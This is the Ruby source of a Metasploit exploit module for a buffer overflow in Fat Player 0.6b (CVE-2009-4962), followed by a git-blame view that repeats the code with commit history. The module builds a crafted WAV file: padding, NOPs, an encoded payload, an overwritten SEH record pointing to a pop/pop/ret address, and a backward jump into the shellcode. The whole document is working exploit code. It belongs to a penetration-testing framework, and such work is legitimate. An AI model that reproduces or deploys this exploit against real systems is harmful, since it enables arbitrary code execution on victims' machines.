modules/exploits/windows/fileformat/fatplayer_wav.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Fat Player Media Player 0.6b0 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Fat Player 0.6b. When
        the application is used to import a specially crafted wav file, a buffer overflow occurs
        allowing arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Fitts <fitts.james[at]gmail.com>', 		# Original Exploit
          'dookie',		# Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2009-4962'],
          [ 'OSVDB', '57343'],
          [ 'EDB', '15279' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x0046bee3 } ],	# p/p/r in FatPlayer.exe
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-10-18',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ])

  end

  def exploit

    sploit = rand_text_alpha_upper(100)
    sploit << make_nops(100)
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(3932 - (payload.encoded.length))
    sploit << generate_seh_record(target.ret)
    sploit << "\xe9\x60\xf0\xff\xff"	# Jump back 4000 bytes

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(sploit)

  end
end
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`Rank = NormalRanking`

			`include Msf::Exploit::FILEFORMAT`
			`include Msf::Exploit::Remote::Seh`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Fat Player Media Player 0.6b0 Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a buffer overflow in Fat Player 0.6b. When`
			`the application is used to import a specially crafted wav file, a buffer overflow occurs`
			`allowing arbitrary code execution.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
James has more modules that need to be updated. 2012-12-24 17:51:58 -06:00			`'James Fitts <fitts.james[at]gmail.com>', # Original Exploit`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`'dookie', # Metasploit Module`
			`],`
			`'References' =>`
			`[`
Update CVEs for fileformat exploits 2012-06-28 00:21:03 -05:00			`[ 'CVE', '2009-4962'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '57343'],`
References EDB cleanup 2012-10-23 21:02:09 +02:00			`[ 'EDB', '15279' ],`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'seh',`
replace strings with bools 2020-01-14 20:47:27 -05:00			`'DisablePayloadHandler' => true`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`},`
			`'Payload' =>`
			`{`
			`'Space' => 500,`
			`'BadChars' => "\x00\x0a",`
			`'StackAdjustment' => -3500`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows Universal', { 'Ret' => 0x0046bee3 } ], # p/p/r in FatPlayer.exe`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2010-10-18',`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00
			`end`

			`def exploit`

			`sploit = rand_text_alpha_upper(100)`
			`sploit << make_nops(100)`
			`sploit << payload.encoded`
			`sploit << rand_text_alpha_upper(3932 - (payload.encoded.length))`
			`sploit << generate_seh_record(target.ret)`
			`sploit << "\xe9\x60\xf0\xff\xff" # Jump back 4000 bytes`
Solved most of msftidy issues with the /modules directory 2011-11-28 04:42:59 +00:00
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`print_status("Creating '#{datastore['FILENAME']}' file ...")`

			`file_create(sploit)`
Solved most of msftidy issues with the /modules directory 2011-11-28 04:42:59 +00:00
exploit module fatplayer_wav.rb from dookie. 2010-10-20 11:53:12 +00:00			`end`
			`end`